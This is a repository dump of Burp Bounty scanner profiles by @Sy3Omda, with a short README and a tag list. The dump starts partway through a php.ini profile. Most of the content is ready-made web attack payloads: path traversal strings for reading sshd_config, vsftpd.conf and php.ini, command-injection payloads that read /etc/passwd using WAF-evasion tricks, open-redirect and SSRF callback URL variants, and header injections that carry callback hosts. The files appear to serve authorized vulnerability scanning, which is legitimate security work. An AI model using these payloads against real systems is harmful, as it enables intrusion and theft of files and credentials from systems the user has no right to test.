86 | "PathTraversal",
87 | "All"
88 | ],
89 | "PayloadResponse": false,
90 | "NotResponse": false,
91 | "TimeOut1": "",
92 | "TimeOut2": "",
93 | "isTime": false,
94 | "contentLength": "",
95 | "iscontentLength": false,
96 | "CaseSensitive": false,
97 | "ExcludeHTTP": false,
98 | "OnlyHTTP": false,
99 | "IsContentType": false,
100 | "ContentType": "",
101 | "HttpResponseCode": "",
102 | "NegativeCT": false,
103 | "IsResponseCode": false,
104 | "ResponseCode": "",
105 | "NegativeRC": false,
106 | "urlextension": "",
107 | "isurlextension": false,
108 | "NegativeUrlExtension": false,
109 | "MatchType": 1,
110 | "Scope": 0,
111 | "RedirType": 0,
112 | "MaxRedir": 0,
113 | "payloadPosition": 1,
114 | "payloadsFile": "",
115 | "grepsFile": "",
116 | "IssueName": "Linux-php.ini",
117 | "IssueSeverity": "Medium",
118 | "IssueConfidence": "Certain",
119 | "IssueDetail": "Linux-php.ini",
120 | "RemediationDetail": "",
121 | "IssueBackground": "",
122 | "RemediationBackground": "",
123 | "Header": [
124 | {
125 | "type": "Payload",
126 | "match": "{FILE}",
127 | "replace": "apache2/php.ini",
128 | "regex": "String"
129 | }
130 | ],
131 | "VariationAttributes": [],
132 | "InsertionPointType": [
133 | 32,
134 | 0,
135 | 37
136 | ],
137 | "Scanas": false,
138 | "Scantype": 0,
139 | "pathDiscovery": false
140 | }
141 | ]
--------------------------------------------------------------------------------
/Linux-sshd-conf.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "Linux-sshd-conf",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "@Sy3Omda",
8 | "Payloads": [
9 | "true,..%5c..%5c{FILE}",
10 | "true,..%5c..%5c..%5c{FILE}",
11 | "true,..%5c..%5c..%5c..%5c{FILE}",
12 | "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
13 | "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
14 | "true,..%252f{FILE}",
15 | "true,..%252f..%252f{FILE}",
16 | "true,..%252f..%252f..%252f{FILE}",
17 | "true,..%252f..%252f..%252f..%252f{FILE}",
18 | "true,./../{FILE}",
19 | "true,./.././../{FILE}",
20 | "true,./.././.././.././../{FILE}",
21 | "true,./.././.././.././.././../{FILE}",
22 | "true,..///{FILE}",
23 | "true,..///..///{FILE}",
24 | "true,..///..///..///{FILE}",
25 | "true,..///..///..///..///{FILE}",
26 | "true,..///..///..///..///..///{FILE}",
27 | "true,..//{FILE}",
28 | "true,..//..//{FILE}",
29 | "true,..//..//..//{FILE}",
30 | "true,..//..//..//..//{FILE}",
31 | "true,..//..//..//..//..//{FILE}",
32 | "true,../{FILE}",
33 | "true,../../{FILE}",
34 | "true,../../../{FILE}",
35 | "true,../../../../{FILE}",
36 | "true,../../../../../{FILE}",
37 | "true,../{FILE}%00",
38 | "true,../../{FILE}%00",
39 | "true,../../../{FILE}%00",
40 | "true,../../../../{FILE}%00",
41 | "true,../../../../../{FILE}%00",
42 | "true,....//{FILE}",
43 | "true,....//....//{FILE}",
44 | "true,....//....//....//{FILE}",
45 | "true,....//....//....//....//{FILE}",
46 | "true,....//....//....//....//....//{FILE}",
47 | "true,....%2F%2F{FILE}",
48 | "true,....%2F%2F....%2F%2F{FILE}",
49 | "true,....%2F%2F....%2F%2F....%2F%2F{FILE}",
50 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
51 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
52 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
53 | "true,..%2f{FILE}",
54 | "true,..%2f..%2f{FILE}",
55 | "true,..%2f..%2f..%2f{FILE}",
56 | "true,..%2f..%2f..%2f..%2f{FILE}",
57 | "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
58 | "true,..%%32%66{FILE}",
59 | "true,..%%32%66..%%32%66{FILE}",
60 | "true,..%%32%66..%%32%66..%%32%66{FILE}",
61 | "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
62 | "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
63 | "true,%2e%2e/{FILE}",
64 | "true,%2e%2e/%2e%2e/{FILE}",
65 | "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
66 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
67 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
68 | "true,%252e%252e/{FILE}",
69 | "true,%252e%252e/%252e%252e/{FILE}",
70 | "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
71 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
72 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
73 | "true,%%32%65%%32%65/{FILE}",
74 | "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
75 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
76 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
77 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}"
78 | ],
79 | "Encoder": [],
80 | "UrlEncode": false,
81 | "CharsToUrlEncode": "",
82 | "Grep": [
83 | "true,,HostKey"
84 | ],
85 | "Tags": [
86 | "PathTraversal",
87 | "All"
88 | ],
89 | "PayloadResponse": false,
90 | "NotResponse": false,
91 | "TimeOut1": "",
92 | "TimeOut2": "",
93 | "isTime": false,
94 | "contentLength": "",
95 | "iscontentLength": false,
96 | "CaseSensitive": false,
97 | "ExcludeHTTP": false,
98 | "OnlyHTTP": false,
99 | "IsContentType": false,
100 | "ContentType": "",
101 | "HttpResponseCode": "",
102 | "NegativeCT": false,
103 | "IsResponseCode": false,
104 | "ResponseCode": "",
105 | "NegativeRC": false,
106 | "urlextension": "",
107 | "isurlextension": false,
108 | "NegativeUrlExtension": false,
109 | "MatchType": 1,
110 | "Scope": 0,
111 | "RedirType": 0,
112 | "MaxRedir": 0,
113 | "payloadPosition": 1,
114 | "payloadsFile": "",
115 | "grepsFile": "",
116 | "IssueName": "Linux-sshd-conf",
117 | "IssueSeverity": "Medium",
118 | "IssueConfidence": "Certain",
119 | "IssueDetail": "Linux-sshd-conf",
120 | "RemediationDetail": "",
121 | "IssueBackground": "",
122 | "RemediationBackground": "",
123 | "Header": [
124 | {
125 | "type": "Payload",
126 | "match": "{FILE}",
127 | "replace": "etc/ssh/sshd_config",
128 | "regex": "String"
129 | }
130 | ],
131 | "VariationAttributes": [],
132 | "InsertionPointType": [
133 | 32,
134 | 0,
135 | 37
136 | ],
137 | "Scanas": false,
138 | "Scantype": 0,
139 | "pathDiscovery": false
140 | }
141 | ]
--------------------------------------------------------------------------------
/Linux-vsftpd-conf.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "Linux-vsftpd-conf",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "@Sy3Omda",
8 | "Payloads": [
9 | "true,..%5c..%5c{FILE}",
10 | "true,..%5c..%5c..%5c{FILE}",
11 | "true,..%5c..%5c..%5c..%5c{FILE}",
12 | "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
13 | "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
14 | "true,..%252f{FILE}",
15 | "true,..%252f..%252f{FILE}",
16 | "true,..%252f..%252f..%252f{FILE}",
17 | "true,..%252f..%252f..%252f..%252f{FILE}",
18 | "true,./../{FILE}",
19 | "true,./.././../{FILE}",
20 | "true,./.././.././.././../{FILE}",
21 | "true,./.././.././.././.././../{FILE}",
22 | "true,..///{FILE}",
23 | "true,..///..///{FILE}",
24 | "true,..///..///..///{FILE}",
25 | "true,..///..///..///..///{FILE}",
26 | "true,..///..///..///..///..///{FILE}",
27 | "true,..//{FILE}",
28 | "true,..//..//{FILE}",
29 | "true,..//..//..//{FILE}",
30 | "true,..//..//..//..//{FILE}",
31 | "true,..//..//..//..//..//{FILE}",
32 | "true,../{FILE}",
33 | "true,../../{FILE}",
34 | "true,../../../{FILE}",
35 | "true,../../../../{FILE}",
36 | "true,../../../../../{FILE}",
37 | "true,../{FILE}%00",
38 | "true,../../{FILE}%00",
39 | "true,../../../{FILE}%00",
40 | "true,../../../../{FILE}%00",
41 | "true,../../../../../{FILE}%00",
42 | "true,....//{FILE}",
43 | "true,....//....//{FILE}",
44 | "true,....//....//....//{FILE}",
45 | "true,....//....//....//....//{FILE}",
46 | "true,....//....//....//....//....//{FILE}",
47 | "true,....%2F%2F{FILE}",
48 | "true,....%2F%2F....%2F%2F{FILE}",
49 | "true,....%2F%2F....%2F%2F....%2F%2F{FILE}",
50 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
51 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
52 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
53 | "true,..%2f{FILE}",
54 | "true,..%2f..%2f{FILE}",
55 | "true,..%2f..%2f..%2f{FILE}",
56 | "true,..%2f..%2f..%2f..%2f{FILE}",
57 | "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
58 | "true,..%%32%66{FILE}",
59 | "true,..%%32%66..%%32%66{FILE}",
60 | "true,..%%32%66..%%32%66..%%32%66{FILE}",
61 | "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
62 | "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
63 | "true,%2e%2e/{FILE}",
64 | "true,%2e%2e/%2e%2e/{FILE}",
65 | "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
66 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
67 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
68 | "true,%252e%252e/{FILE}",
69 | "true,%252e%252e/%252e%252e/{FILE}",
70 | "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
71 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
72 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
73 | "true,%%32%65%%32%65/{FILE}",
74 | "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
75 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
76 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
77 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}"
78 | ],
79 | "Encoder": [],
80 | "UrlEncode": false,
81 | "CharsToUrlEncode": "",
82 | "Grep": [
83 | "true,,Example config file"
84 | ],
85 | "Tags": [
86 | "PathTraversal",
87 | "All"
88 | ],
89 | "PayloadResponse": false,
90 | "NotResponse": false,
91 | "TimeOut1": "",
92 | "TimeOut2": "",
93 | "isTime": false,
94 | "contentLength": "",
95 | "iscontentLength": false,
96 | "CaseSensitive": false,
97 | "ExcludeHTTP": false,
98 | "OnlyHTTP": false,
99 | "IsContentType": false,
100 | "ContentType": "",
101 | "HttpResponseCode": "",
102 | "NegativeCT": false,
103 | "IsResponseCode": false,
104 | "ResponseCode": "",
105 | "NegativeRC": false,
106 | "urlextension": "",
107 | "isurlextension": false,
108 | "NegativeUrlExtension": false,
109 | "MatchType": 1,
110 | "Scope": 0,
111 | "RedirType": 0,
112 | "MaxRedir": 0,
113 | "payloadPosition": 1,
114 | "payloadsFile": "",
115 | "grepsFile": "",
116 | "IssueName": "Linux-vsftpd-conf",
117 | "IssueSeverity": "Medium",
118 | "IssueConfidence": "Certain",
119 | "IssueDetail": "Linux-vsftpd-conf",
120 | "RemediationDetail": "",
121 | "IssueBackground": "",
122 | "RemediationBackground": "",
123 | "Header": [
124 | {
125 | "type": "Payload",
126 | "match": "{FILE}",
127 | "replace": "etc/vsftpd.conf",
128 | "regex": "String"
129 | }
130 | ],
131 | "VariationAttributes": [],
132 | "InsertionPointType": [
133 | 32,
134 | 0,
135 | 37
136 | ],
137 | "Scanas": false,
138 | "Scantype": 0,
139 | "pathDiscovery": false
140 | }
141 | ]
--------------------------------------------------------------------------------
/OOB-Callbacks.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "OOB-Callbacks",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "@Sy3Omda",
8 | "Payloads": [
9 | "true,%00/{BC}",
10 | "true,%09/{BC}",
11 | "true,%0a/{BC}",
12 | "true,%0d/{BC}",
13 | "true,1/_https@{BC}",
14 | "true,%5C%5C{BC}/%252e%252e%252f",
15 | "true,/%5c{BC}",
16 | "true,%5C{BC}",
17 | "true,%5c{BC}/%2f%2e%2e",
18 | "true,../{BC}",
19 | "true,.{BC}",
20 | "true,////\\;@{BC}",
21 | "true,///{BC}",
22 | "true,///{BC}@/",
23 | "true,//;@{BC}",
24 | "true,//\\/{BC}",
25 | "true,//\\@{BC}",
26 | "true,//\\{BC}",
27 | "true,//{BC}/",
28 | "true,//{BC}@/",
29 | "true,/\u003c\u003e//{BC}",
30 | "true,/\\/\\/{BC}",
31 | "true,/\\/{BC}",
32 | "true,/\\{BC}",
33 | "true,/{BC}",
34 | "true,\u003c\u003e//{BC}",
35 | "true,@{BC}",
36 | "true,\\/\\/{BC}",
37 | "true,{BC}/",
38 | "true,{BC};@",
39 | "true,//{BC}/%2F..",
40 | "true,/{BC}/%2F..",
41 | "true,///{BC}/%2f%2e%2e",
42 | "true,/{BC}/..;/css",
43 | "true,//{BC}\\t{BC}",
44 | "true,example%E3%80%82com",
45 | "true,https://%09/{BC}",
46 | "true,https:%0a%0d{BC}",
47 | "true,https://%0a%0d{BC}",
48 | "true,https://%23.{BC}",
49 | "true,https://%2f%2f.{BC}",
50 | "true,https%3a%2f%2f{BC}%2f",
51 | "true,https://%3F.{BC}",
52 | "true,https://%5c%5c.{BC}",
53 | "true,https://%5c{BC}@",
54 | "true,https://:80#@{BC}",
55 | "true,https://:80?@{BC}",
56 | "true,//https://{BC}@/",
57 | "true,/https:{BC}",
58 | "true,@https://{BC}",
59 | "true,https://.{BC}",
60 | "true,https://////{BC}",
61 | "true,https:///{BC}",
62 | "true,https://:@\\@{BC}",
63 | "true,https://;@{BC}",
64 | "true,https:/\\/\\{BC}",
65 | "true,https:/\\{BC}",
66 | "true,https:/{BC}",
67 | "true,https:{BC}",
68 | "true,https:///{BC}/%2e%2e",
69 | "true,https:///{BC}/%2f%2e%2e",
70 | "true,https://:@{BC}\\@{BC}",
71 | "true,https://{BC}/{BC}",
72 | "true,https:///{BC}@{BC}/%2e%2e",
73 | "true,https:///{BC}@{BC}/%2f%2e%2e",
74 | "true,https://{BC}/https://{BC}",
75 | "true,https://:@{BC}\\@WillBeReplaced.com",
76 | "true,https://\\t{BC}",
77 | "true,https://www.\\.{BC}",
78 | "true,//\\t{BC}"
79 | ],
80 | "Encoder": [],
81 | "UrlEncode": false,
82 | "CharsToUrlEncode": "",
83 | "Grep": [],
84 | "Tags": [
85 | "Collaborator",
86 | "All"
87 | ],
88 | "PayloadResponse": false,
89 | "NotResponse": false,
90 | "TimeOut1": "",
91 | "TimeOut2": "",
92 | "isTime": false,
93 | "contentLength": "",
94 | "iscontentLength": false,
95 | "CaseSensitive": false,
96 | "ExcludeHTTP": false,
97 | "OnlyHTTP": false,
98 | "IsContentType": false,
99 | "ContentType": "",
100 | "HttpResponseCode": "",
101 | "NegativeCT": false,
102 | "IsResponseCode": false,
103 | "ResponseCode": "",
104 | "NegativeRC": false,
105 | "urlextension": "",
106 | "isurlextension": false,
107 | "NegativeUrlExtension": false,
108 | "MatchType": 1,
109 | "Scope": 0,
110 | "RedirType": 4,
111 | "MaxRedir": 9,
112 | "payloadPosition": 1,
113 | "payloadsFile": "",
114 | "grepsFile": "",
115 | "IssueName": "OOB-Callbacks",
116 | "IssueSeverity": "Medium",
117 | "IssueConfidence": "Firm",
118 | "IssueDetail": "Payload: \u003cpayload\u003e\u003cbr\u003e\u003cbr\u003e\nThis issue could be ssrf callback or simply open redirect\u003cbr\u003e",
119 | "RemediationDetail": "",
120 | "IssueBackground": "",
121 | "RemediationBackground": "",
122 | "Header": [],
123 | "VariationAttributes": [],
124 | "InsertionPointType": [
125 | 65,
126 | 1,
127 | 0,
128 | 37
129 | ],
130 | "Scanas": false,
131 | "Scantype": 0,
132 | "pathDiscovery": false
133 | }
134 | ]
--------------------------------------------------------------------------------
/RCE-linux-Based.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "RCE-linux-Based",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "@Sy3Omda",
8 | "Payloads": [
9 | "true,;cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
10 | "true,;cat$u /etc$u/passwd$u",
11 | "true,;{cat,/etc/passwd}",
12 | "true,;cat\u003c/etc/passwd",
13 | "true,;/???/??t /???/??ss??",
14 | "true,%0Acat%20/etc/passwd",
15 | "true,;cat$IFS/etc/passwd",
16 | "true,;echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
17 | "true,;who$@ami",
18 | "true,;w\\ho\\am\\i",
19 | "true,;w\"h\"o\"am\"i",
20 | "true,;w\u0027h\u0027o\u0027am\u0027i",
21 | "true,a;id;",
22 | "true,|/bin/ls -al",
23 | "true,a;/usr/bin/id;"
24 | ],
25 | "Encoder": [],
26 | "UrlEncode": false,
27 | "CharsToUrlEncode": "",
28 | "Grep": [
29 | "true,,root:x",
30 | "true,Or,www-data"
31 | ],
32 | "Tags": [
33 | "All",
34 | "RCE"
35 | ],
36 | "PayloadResponse": false,
37 | "NotResponse": false,
38 | "TimeOut1": "",
39 | "TimeOut2": "",
40 | "isTime": false,
41 | "contentLength": "",
42 | "iscontentLength": false,
43 | "CaseSensitive": false,
44 | "ExcludeHTTP": false,
45 | "OnlyHTTP": false,
46 | "IsContentType": false,
47 | "ContentType": "",
48 | "HttpResponseCode": "",
49 | "NegativeCT": false,
50 | "IsResponseCode": false,
51 | "ResponseCode": "",
52 | "NegativeRC": false,
53 | "urlextension": "",
54 | "isurlextension": false,
55 | "NegativeUrlExtension": false,
56 | "MatchType": 1,
57 | "Scope": 0,
58 | "RedirType": 0,
59 | "MaxRedir": 0,
60 | "payloadPosition": 2,
61 | "payloadsFile": "",
62 | "grepsFile": "",
63 | "IssueName": "RCE-linux-Based",
64 | "IssueSeverity": "High",
65 | "IssueConfidence": "Certain",
66 | "IssueDetail": "RCE payload: \u003cbr\u003e \u003cpayload\u003e",
67 | "RemediationDetail": "",
68 | "IssueBackground": "",
69 | "RemediationBackground": "",
70 | "Header": [],
71 | "VariationAttributes": [],
72 | "InsertionPointType": [
73 | 65,
74 | 32,
75 | 2,
76 | 0,
77 | 37
78 | ],
79 | "Scanas": false,
80 | "Scantype": 0,
81 | "pathDiscovery": false
82 | }
83 | ]
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # burp-bounty
2 |
3 | Burp Bounty is extension of Burp Suite that improve Burp scanner.
4 | The Original Repo: https://github.com/wagiro/BurpBounty
5 | Author Twitter: [egarme](https://twitter.com/egarme)
6 |
7 | ## Profiles
8 |
9 | #### Active Scanner
10 | * Linux Apache2 conf
11 | * Linux mysql conf
12 | * Linux self environ
13 | * Linux source list
14 | * Linux sshd conf
15 | * Linux vsftpd conf
16 | * Linux vsftpd log
17 |
18 | #### Passive Scanner
19 | * Creds Disclosed
20 | * JWT-Request
21 | * JWT-Response
22 | * GraphqlPath
23 |
--------------------------------------------------------------------------------
/X-Headers-Collaborator.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "X-Headers-Collaborator",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "@Sy3Omda",
8 | "Payloads": [
9 | "true,http://{BC}",
10 | "true,{BC}"
11 | ],
12 | "Encoder": [],
13 | "UrlEncode": false,
14 | "CharsToUrlEncode": "",
15 | "Grep": [],
16 | "Tags": [
17 | "Collaborator",
18 | "All"
19 | ],
20 | "PayloadResponse": false,
21 | "NotResponse": false,
22 | "TimeOut1": "",
23 | "TimeOut2": "",
24 | "isTime": false,
25 | "contentLength": "",
26 | "iscontentLength": false,
27 | "CaseSensitive": false,
28 | "ExcludeHTTP": false,
29 | "OnlyHTTP": false,
30 | "IsContentType": false,
31 | "ContentType": "",
32 | "HttpResponseCode": "",
33 | "NegativeCT": false,
34 | "IsResponseCode": false,
35 | "ResponseCode": "",
36 | "NegativeRC": false,
37 | "urlextension": "",
38 | "isurlextension": false,
39 | "NegativeUrlExtension": false,
40 | "MatchType": 1,
41 | "Scope": 0,
42 | "RedirType": 0,
43 | "MaxRedir": 0,
44 | "payloadPosition": 1,
45 | "payloadsFile": "",
46 | "grepsFile": "",
47 | "IssueName": "X-Headers-Collaborator",
48 | "IssueSeverity": "Medium",
49 | "IssueConfidence": "Firm",
50 | "IssueDetail": "X-Headers-Collaborator",
51 | "RemediationDetail": "",
52 | "IssueBackground": "",
53 | "RemediationBackground": "",
54 | "Header": [
55 | {
56 | "type": "Request",
57 | "match": "X-Forwarded-For:.*",
58 | "replace": "X-Forwarded-For: {PAYLOAD}",
59 | "regex": "Regex"
60 | },
61 | {
62 | "type": "Request",
63 | "match": "X-Host:.*",
64 | "replace": "X-Host: {PAYLOAD}",
65 | "regex": "Regex"
66 | },
67 | {
68 | "type": "Request",
69 | "match": "X-Forwarded-Server:*",
70 | "replace": "X-Forwarded-Server: {PAYLOAD}",
71 | "regex": "Regex"
72 | },
73 | {
74 | "type": "Request",
75 | "match": "X-Forwarded-Scheme:.*",
76 | "replace": "X-Forwarded-Scheme: {PAYLOAD}",
77 | "regex": "Regex"
78 | },
79 | {
80 | "type": "Request",
81 | "match": "X-Original-URL:.*",
82 | "replace": "X-Original-URL: {PAYLOAD}",
83 | "regex": "Regex"
84 | },
85 | {
86 | "type": "Request",
87 | "match": "X-Rewrite-URL:.*",
88 | "replace": "X-Rewrite-URL: {PAYLOAD}",
89 | "regex": "Regex"
90 | },
91 | {
92 | "type": "Request",
93 | "match": "Forwarded: for\u003d.*",
94 | "replace": "Forwarded: for\u003d {PAYLOAD}",
95 | "regex": "Regex"
96 | },
97 | {
98 | "type": "Request",
99 | "match": "Origin:.*",
100 | "replace": "Origin: {PAYLOAD}",
101 | "regex": "Regex"
102 | },
103 | {
104 | "type": "Request",
105 | "match": "Referer:.*",
106 | "replace": "Referer: {PAYLOAD}",
107 | "regex": "Regex"
108 | },
109 | {
110 | "type": "Request",
111 | "match": "X-Forwarded-Host:.*",
112 | "replace": "X-Forwarded-Host: {PAYLOAD}",
113 | "regex": "Regex"
114 | },
115 | {
116 | "type": "Request",
117 | "match": "X-Forwarded-Proto:.*",
118 | "replace": "X-Forwarded-Proto: {PAYLOAD}",
119 | "regex": "Regex"
120 | },
121 | {
122 | "type": "Request",
123 | "match": "X-ProxyUser-Ip:.*",
124 | "replace": "X-ProxyUser-Ip: {PAYLOAD}",
125 | "regex": "Regex"
126 | },
127 | {
128 | "type": "Request",
129 | "match": "X-Wap-Profile:.*",
130 | "replace": "X-Wap-Profile: {PAYLOAD}",
131 | "regex": "Regex"
132 | },
133 | {
134 | "type": "Request",
135 | "match": "Client-IP:.*",
136 | "replace": "Client-IP: {PAYLOAD}",
137 | "regex": "Regex"
138 | },
139 | {
140 | "type": "Request",
141 | "match": "True-Client-IP:.*",
142 | "replace": "True-Client-IP: {PAYLOAD}",
143 | "regex": "Regex"
144 | },
145 | {
146 | "type": "Request",
147 | "match": "Cluster-Client-IP:.*",
148 | "replace": "Cluster-Client-IP: {PAYLOAD}",
149 | "regex": "Regex"
150 | }
151 | ],
152 | "VariationAttributes": [],
153 | "InsertionPointType": [
154 | 32
155 | ],
156 | "Scanas": false,
157 | "Scantype": 0,
158 | "pathDiscovery": false
159 | }
160 | ]
--------------------------------------------------------------------------------
/tags.txt:
--------------------------------------------------------------------------------
1 | Collaborator
2 | PathTraversal
3 | RCE
4 | SQLi
5 | CookieAttributes
6 | SecurityHeaders
7 | XSS
8 | JWT
9 | CMS
10 | CVE
11 | Errors
12 | InformationDisclosure
13 | API
14 | SQLi
15 | XXE
16 | endpoints
17 | regex
18 | Variations
19 | Graphql
20 | Cloud
21 | All
22 | Mobile
23 | log4shell
24 |
--------------------------------------------------------------------------------